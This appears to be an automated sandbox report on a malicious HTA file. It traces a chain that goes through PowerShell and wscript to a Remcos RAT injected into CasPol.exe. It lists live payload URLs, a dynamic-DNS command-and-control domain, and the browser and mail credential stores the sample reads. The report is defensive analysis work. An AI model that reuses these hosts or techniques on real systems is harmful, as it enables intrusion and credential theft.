                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.WindowsAuthenticationProtocols.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsAuthenticationProtocols.Commands.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.WindowsAuthenticationProtocols.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsAuthenticationProtocols.Commands.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.WindowsAuthenticationProtocols.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsAuthenticationProtocols.Commands.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package0012~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-UEV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\UEV\Microsoft.Uev.Commands.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\WindowsErrorReporting\Microsoft.WindowsErrorReporting.PowerShell.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Program Files (x86)\AutoIt3\AutoItX\AutoItX3.PowerShell.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeQueries volume information: C:\ VolumeInformation
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_00404915 GetLocalTime,CreateEventA,CreateThread,12_2_00404915
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_0041A7B2 GetComputerNameExW,GetUserNameW,12_2_0041A7B2
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_00448067 _free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,12_2_00448067
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 13_2_0041739B GetVersionExW,13_2_0041739B
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                    Stealing of Sensitive Information

                    barindex
                    Source: Yara matchFile source: 12.2.CasPol.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 7.2.powershell.exe.6646180.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 7.2.powershell.exe.6646180.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 12.2.CasPol.exe.400000.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0000000C.00000002.4130039364.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000007.00000002.2025398722.00000000065A5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000C.00000002.4132696027.0000000000F38000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000007.00000002.2025398722.000000000573C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 7776, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: CasPol.exe PID: 6772, type: MEMORYSTR
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: \AppData\Local\Google\Chrome\User Data\Default\Login Data12_2_0040B21B
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: \AppData\Roaming\Mozilla\Firefox\Profiles\12_2_0040B335
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: \key3.db12_2_0040B335
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\key4.dbJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqlite
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeKey opened: HKEY_CURRENT_USER\Software\Google\Google Talk\Accounts
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\IdentityCRL\Dynamic Salt
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\IdentityCRL\Dynamic Salt
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeKey opened: HKEY_CURRENT_USER\Software\Google\Google Talk\Accounts
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeKey opened: HKEY_CURRENT_USER\Software\Paltalk
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows Live Mail
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: ESMTPPassword14_2_004033F0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: _mbscpy,_mbscpy,_mbscpy,_mbscpy,RegCloseKey, PopPassword14_2_00402DB3
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: _mbscpy,_mbscpy,_mbscpy,_mbscpy,RegCloseKey, SMTPPassword14_2_00402DB3
                    Source: Yara matchFile source: Process Memory Space: CasPol.exe PID: 4208, type: MEMORYSTR

                    Remote Access Functionality

                    barindex
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeMutex created: \Sessions\1\BaseNamedObjects\Rmc-B3IX49Jump to behavior
                    Source: Yara matchFile source: 12.2.CasPol.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 7.2.powershell.exe.6646180.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 7.2.powershell.exe.6646180.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 12.2.CasPol.exe.400000.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0000000C.00000002.4130039364.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000007.00000002.2025398722.00000000065A5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000C.00000002.4132696027.0000000000F38000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000007.00000002.2025398722.000000000573C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 7776, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: CasPol.exe PID: 6772, type: MEMORYSTR
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: cmd.exe12_2_00405042
                    ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                    Gather Victim Identity Information111
                    Scripting
                    Valid Accounts11
                    Native API
                    111
                    Scripting
                    1
                    DLL Side-Loading
                    1
                    Deobfuscate/Decode Files or Information
                    2
                    OS Credential Dumping
                    2
                    System Time Discovery
                    Remote Services11
                    Archive Collected Data
                    1
                    Web Service
                    Exfiltration Over Other Network Medium1
                    System Shutdown/Reboot
                    CredentialsDomainsDefault Accounts1
                    Exploitation for Client Execution
                    1
                    DLL Side-Loading
                    1
                    Bypass User Account Control
                    2
                    Obfuscated Files or Information
                    111
                    Input Capture
                    1
                    Account Discovery
                    Remote Desktop Protocol1
                    Data from Local System
                    12
                    Ingress Tool Transfer
                    Exfiltration Over Bluetooth1
                    Defacement
                    Email AddressesDNS ServerDomain Accounts132
                    Command and Scripting Interpreter
                    1
                    Windows Service
                    1
                    Access Token Manipulation
                    1
                    DLL Side-Loading
                    2
                    Credentials in Registry
                    1
                    System Service Discovery
                    SMB/Windows Admin Shares11
                    Email Collection
                    21
                    Encrypted Channel
                    Automated ExfiltrationData Encrypted for Impact
                    Employee NamesVirtual Private ServerLocal Accounts2
                    Service Execution
                    Login Hook1
                    Windows Service
                    1
                    Bypass User Account Control
                    3
                    Credentials In Files
                    3
                    File and Directory Discovery
                    Distributed Component Object Model111
                    Input Capture
                    1
                    Non-Standard Port
                    Traffic DuplicationData Destruction
                    Gather Victim Network InformationServerCloud Accounts3
                    PowerShell
                    Network Logon Script422
                    Process Injection
                    1
                    Masquerading
                    LSA Secrets39
                    System Information Discovery
                    SSH3
                    Clipboard Data
                    1
                    Remote Access Software
                    Scheduled TransferData Encrypted for Impact
                    Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts21
                    Virtualization/Sandbox Evasion
                    Cached Domain Credentials31
                    Security Software Discovery
                    VNCGUI Input Capture2
                    Non-Application Layer Protocol
                    Data Transfer Size LimitsService Stop
                    DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
                    Access Token Manipulation
                    DCSync21
                    Virtualization/Sandbox Evasion
                    Windows Remote ManagementWeb Portal Capture213
                    Application Layer Protocol
                    Exfiltration Over C2 ChannelInhibit System Recovery
                    Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job422
                    Process Injection
                    Proc Filesystem4
                    Process Discovery
                    Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                    Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAtHTML Smuggling/etc/passwd and /etc/shadow1
                    Application Window Discovery
                    Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                    IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCronDynamic API ResolutionNetwork Sniffing1
                    System Owner/User Discovery
                    Shared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement
                    Hide Legend

                    Legend:

                    • Process
                    • Signature
                    • Created File
                    • DNS/IP Info
                    • Is Dropped
                    • Is Windows Process
                    • Number of created Registry Values
                    • Number of created Files
                    • Visual Basic
                    • Delphi
                    • Java
                    • .Net C# or VB.NET
                    • C, C++ or other language
                    • Is malicious
                    • Internet
                    behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1575615 Sample: clearentirethingwithbestnot... Startdate: 16/12/2024 Architecture: WINDOWS Score: 100 56 kelexrmcadmnnccupdated.duckdns.org 2->56 58 paste.ee 2->58 60 2 other IPs or domains 2->60 74 Suricata IDS alerts for network traffic 2->74 76 Found malware configuration 2->76 78 Malicious sample detected (through community Yara rule) 2->78 84 17 other signatures 2->84 12 mshta.exe 1 2->12         started        signatures3 80 Uses dynamic DNS services 56->80 82 Connects to a pastebin service (likely for C&C) 58->82 process4 signatures5 110 Suspicious command line found 12->110 112 PowerShell case anomaly found 12->112 15 cmd.exe 1 12->15         started        process6 signatures7 114 Detected Cobalt Strike Beacon 15->114 116 Suspicious powershell command line found 15->116 118 Wscript starts Powershell (via cmd or directly) 15->118 120 PowerShell case anomaly found 15->120 18 powershell.exe 42 15->18         started        23 conhost.exe 15->23         started        process8 dnsIp9 62 192.3.122.159, 49730, 80 AS-COLOCROSSINGUS United States 18->62 50 simplegreatfeature...gsentirelifegoi.vbS, Unicode 18->50 dropped 52 C:\Users\user\AppData\...\r1df4acf.cmdline, Unicode 18->52 dropped 86 Loading BitLocker PowerShell Module 18->86 25 wscript.exe 1 18->25         started        28 csc.exe 3 18->28         started        file10 signatures11 process12 file13 96 Detected Cobalt Strike Beacon 25->96 98 Suspicious powershell command line found 25->98 100 Wscript starts Powershell (via cmd or directly) 25->100 102 2 other signatures 25->102 31 powershell.exe 15 16 25->31         started        54 C:\Users\user\AppData\Local\...\r1df4acf.dll, PE32 28->54 dropped 35 cvtres.exe 1 28->35         started        signatures14 process15 dnsIp16 68 paste.ee 172.67.187.200, 443, 49738 CLOUDFLARENETUS United States 31->68 70 Writes to foreign memory regions 31->70 72 Injects a PE file into a foreign processes 31->72 37 CasPol.exe 3 13 31->37         started        41 conhost.exe 31->41         started        signatures17 process18 dnsIp19 64 kelexrmcadmnnccupdated.duckdns.org 107.173.143.31, 14646, 49739, 49740 AS-COLOCROSSINGUS United States 37->64 66 geoplugin.net 178.237.33.50, 49741, 80 ATOM86-ASATOM86NL Netherlands 37->66 88 Contains functionality to bypass UAC (CMSTPLUA) 37->88 90 Detected Remcos RAT 37->90 92 Tries to steal Mail credentials (via file registry) 37->92 94 7 other signatures 37->94 43 CasPol.exe 37->43         started        46 CasPol.exe 37->46         started        48 CasPol.exe 14 37->48         started        signatures20 process21 signatures22 104 Tries to steal Instant Messenger accounts or passwords 43->104 106 Tries to steal Mail credentials (via file / registry access) 43->106 108 Tries to harvest and steal browser information (history, passwords, etc) 46->108

                    This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                    windows-stand
                    SourceDetectionScannerLabelLink
                    clearentirethingwithbestnoticetheeverythinggooodfrome.hta28%VirustotalBrowse
                    clearentirethingwithbestnoticetheeverythinggooodfrome.hta13%ReversingLabsScript-JS.Phishing.Generic
                    No Antivirus matches
                    No Antivirus matches
                    No Antivirus matches
                    SourceDetectionScannerLabelLink
                    http://192.3.122.159/121/simplegreatfeatureswithnicespeakingthingsentirelifegoingon.tIFLMEM0%Avira URL Cloudsafe
                    http://192.3.122.159/121/simplegreatfeatureswithnicespeakingthingsentirelifegoingon.tIF0%Avira URL Cloudsafe
                    http://www.microsoft.h0%Avira URL Cloudsafe
                    kelexrmcadmnnccupdated.duckdns.org0%Avira URL Cloudsafe
                    http://192.3.122.159/0%Avira URL Cloudsafe
                    http://192.3.122.159/121/simpleg0%Avira URL Cloudsafe
                    NameIPActiveMaliciousAntivirus DetectionReputation
                    paste.ee
                    172.67.187.200
                    truefalse
                      high
                      kelexrmcadmnnccupdated.duckdns.org
                      107.173.143.31
                      truetrue
                        unknown
                        geoplugin.net
                        178.237.33.50
                        truefalse
                          high
                          res.cloudinary.com
                          unknown
                          unknownfalse
                            high
                            NameMaliciousAntivirus DetectionReputation
                            http://192.3.122.159/121/simplegreatfeatureswithnicespeakingthingsentirelifegoingon.tIFtrue
                            • Avira URL Cloud: safe
                            unknown
                            kelexrmcadmnnccupdated.duckdns.orgtrue
                            • Avira URL Cloud: safe
                            unknown
                            http://geoplugin.net/json.gpfalse
                              high
                              https://paste.ee/r/pBbD1/0false
                                high
                                NameSourceMaliciousAntivirus DetectionReputation
                                http://nuget.org/NuGet.exepowershell.exe, 00000003.00000002.1795643375.000000000587B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2025398722.000000000573C000.00000004.00000800.00020000.00000000.sdmpfalse
                                  high
                                  https://aka.ms/winsvr-2022-pshelppowershell.exe, 00000003.00000002.1793452153.0000000004969000.00000004.00000800.00020000.00000000.sdmpfalse
                                    high
                                    http://www.imvu.comrCasPol.exe, 0000000F.00000002.2081771578.0000000000400000.00000040.80000000.00040000.00000000.sdmpfalse
                                      high
                                      http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000007.00000002.2025398722.0000000004827000.00000004.00000800.00020000.00000000.sdmpfalse
                                        high
                                        http://geoplugin.net/json.gplCasPol.exe, 0000000C.00000002.4133634036.0000000000F86000.00000004.00000020.00020000.00000000.sdmpfalse
                                          high
                                          http://schemas.xmlsoap.org/soap/encoding/powershell.exe, 00000003.00000002.1793452153.0000000004969000.00000004.00000800.00020000.00000000.sdmpfalse
                                            high
                                            http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000007.00000002.2025398722.0000000004827000.00000004.00000800.00020000.00000000.sdmpfalse
                                              high
                                              https://go.micropowershell.exe, 00000003.00000002.1793452153.0000000004E50000.00000004.00000800.00020000.00000000.sdmpfalse
                                                high
                                                http://geoplugin.net/json.gpUJCasPol.exe, 0000000C.00000002.4132696027.0000000000F38000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  high
                                                  http://www.microsoft.copowershell.exe, 00000003.00000002.1800035532.0000000007E91000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    high
                                                    https://contoso.com/Licensepowershell.exe, 00000007.00000002.2025398722.000000000573C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      high
                                                      https://www.google.com;powershell.exe, 00000007.00000002.2025398722.0000000004940000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        high
                                                        http://192.3.122.159/powershell.exe, 00000003.00000002.1800035532.0000000007E4A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        • Avira URL Cloud: safe
                                                        unknown
                                                        http://www.imvu.comCasPol.exe, CasPol.exe, 0000000F.00000002.2081771578.0000000000400000.00000040.80000000.00040000.00000000.sdmpfalse
                                                          high
                                                          https://contoso.com/Iconpowershell.exe, 00000007.00000002.2025398722.000000000573C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            high
                                                            https://analytics.paste.eepowershell.exe, 00000007.00000002.2025398722.0000000004940000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              high
                                                              http://www.nirsoft.netCasPol.exe, 0000000D.00000002.2090602025.00000000012F4000.00000004.00000010.00020000.00000000.sdmpfalse
                                                                high
                                                                http://192.3.122.159/121/simplegreatfeatureswithnicespeakingthingsentirelifegoingon.tIFLMEMpowershell.exe, 00000003.00000002.1799959412.0000000007DE0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                • Avira URL Cloud: safe
                                                                unknown
                                                                http://go.microspowershell.exe, 00000003.00000002.1793452153.0000000004E50000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  high
                                                                  https://github.com/Pester/Pesterpowershell.exe, 00000007.00000002.2025398722.0000000004827000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    high
                                                                    http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.comCasPol.exe, 0000000F.00000002.2081771578.0000000000400000.00000040.80000000.00040000.00000000.sdmpfalse
                                                                      high
                                                                      https://www.google.compowershell.exe, 00000007.00000002.2025398722.0000000004940000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, CasPol.exe, 0000000F.00000002.2081771578.0000000000400000.00000040.80000000.00040000.00000000.sdmpfalse
                                                                        high
                                                                        https://res.cloudinary.compowershell.exe, 00000007.00000002.2025398722.0000000004827000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                          high
                                                                          http://geoplugin.net/json.gp/Cpowershell.exe, 00000007.00000002.2025398722.00000000065A5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2025398722.000000000573C000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 0000000C.00000002.4130039364.0000000000400000.00000040.00000400.00020000.00000000.sdmpfalse
                                                                            high
                                                                            https://aka.ms/pscore6lBpowershell.exe, 00000003.00000002.1793452153.0000000004811000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2025398722.00000000046D1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                              high
                                                                              https://res.cloudinary.com/dzvai86uh/image/upload/v1734050991/unxaooiykxfmw9pan4z1.jpgtpowershell.exe, 00000007.00000002.2025398722.0000000004827000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                high
                                                                                http://schemas.xmlsoap.org/wsdl/powershell.exe, 00000003.00000002.1793452153.0000000004969000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                  high
                                                                                  https://contoso.com/powershell.exe, 00000007.00000002.2025398722.000000000573C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                    high
                                                                                    https://nuget.org/nuget.exepowershell.exe, 00000003.00000002.1795643375.000000000587B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2025398722.000000000573C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                      high
                                                                                      https://analytics.paste.ee;powershell.exe, 00000007.00000002.2025398722.0000000004940000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                        high
                                                                                        https://www.google.com/accounts/serviceloginCasPol.exefalse
                                                                                          high
                                                                                          http://www.microsoft.hpowershell.exe, 00000003.00000002.1800035532.0000000007E91000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                          • Avira URL Cloud: safe
                                                                                          unknown
                                                                                          https://login.yahoo.com/config/loginCasPol.exefalse
                                                                                            high
                                                                                            https://cdnjs.cloudflare.compowershell.exe, 00000007.00000002.2025398722.0000000004940000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                              high
                                                                                              https://res.cloudinary.com/dzvai86uh/image/upload/v1734050991/unxaooiykxfmw9pan4z1.jpgpowershell.exe, 00000007.00000002.2025398722.0000000004827000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                high
                                                                                                https://cdnjs.cloudflare.com;powershell.exe, 00000007.00000002.2025398722.0000000004940000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                  high
                                                                                                  http://www.nirsoft.net/CasPol.exe, 0000000F.00000002.2081771578.0000000000400000.00000040.80000000.00040000.00000000.sdmpfalse
                                                                                                    high
                                                                                                    http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000003.00000002.1793452153.0000000004811000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2025398722.00000000046D1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                      high
                                                                                                      https://secure.gravatar.compowershell.exe, 00000007.00000002.2025398722.0000000004940000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                        high
                                                                                                        https://themes.googleusercontent.compowershell.exe, 00000007.00000002.2025398722.0000000004940000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                          high
                                                                                                          http://192.3.122.159/121/simplegpowershell.exe, 00000003.00000002.1793452153.0000000004CFA000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                          • Avira URL Cloud: safe
                                                                                                          unknown
                                                                                                          https://github.com/dahall/taskschedulerpowershell.exe, 00000007.00000002.2025398722.0000000006280000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                            high
                                                                                                            http://www.ebuddy.comCasPol.exe, CasPol.exe, 0000000F.00000002.2081771578.0000000000400000.00000040.80000000.00040000.00000000.sdmpfalse
                                                                                                              high
                                                                                                              • No. of IPs < 25%
                                                                                                              • 25% < No. of IPs < 50%
                                                                                                              • 50% < No. of IPs < 75%
                                                                                                              • 75% < No. of IPs
                                                                                                              IPDomainCountryFlagASNASN NameMalicious
                                                                                                              172.67.187.200
                                                                                                              paste.eeUnited States
                                                                                                              13335CLOUDFLARENETUSfalse
                                                                                                              107.173.143.31
                                                                                                              kelexrmcadmnnccupdated.duckdns.orgUnited States
                                                                                                              36352AS-COLOCROSSINGUStrue
                                                                                                              192.3.122.159
                                                                                                              unknownUnited States
                                                                                                              36352AS-COLOCROSSINGUStrue
                                                                                                              178.237.33.50
                                                                                                              geoplugin.netNetherlands
                                                                                                              8455ATOM86-ASATOM86NLfalse
                                                                                                              Joe Sandbox version:41.0.0 Charoite
                                                                                                              Analysis ID:1575615
                                                                                                              Start date and time:2024-12-16 07:11:06 +01:00
                                                                                                              Joe Sandbox product:CloudBasic
                                                                                                              Overall analysis duration:0h 10m 16s
                                                                                                              Hypervisor based Inspection enabled:false
                                                                                                              Report type:full
                                                                                                              Cookbook file name:default.jbs
                                                                                                              Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                              Number of analysed new started processes analysed:17
                                                                                                              Number of new started drivers analysed:0
                                                                                                              Number of existing processes analysed:0
                                                                                                              Number of existing drivers analysed:0
                                                                                                              Number of injected processes analysed:0
                                                                                                              Technologies:
                                                                                                              • HCA enabled
                                                                                                              • EGA enabled
                                                                                                              • AMSI enabled
                                                                                                              Analysis Mode:default
                                                                                                              Analysis stop reason:Timeout
                                                                                                              Sample name:clearentirethingwithbestnoticetheeverythinggooodfrome.hta
                                                                                                              Detection:MAL
                                                                                                              Classification:mal100.rans.phis.troj.spyw.expl.evad.winHTA@24/19@4/4
                                                                                                              EGA Information:
                                                                                                              • Successful, ratio: 85.7%
                                                                                                              HCA Information:
                                                                                                              • Successful, ratio: 99%
                                                                                                              • Number of executed functions: 167
                                                                                                              • Number of non-executed functions: 311
                                                                                                              Cookbook Comments:
                                                                                                              • Found application associated with file extension: .hta
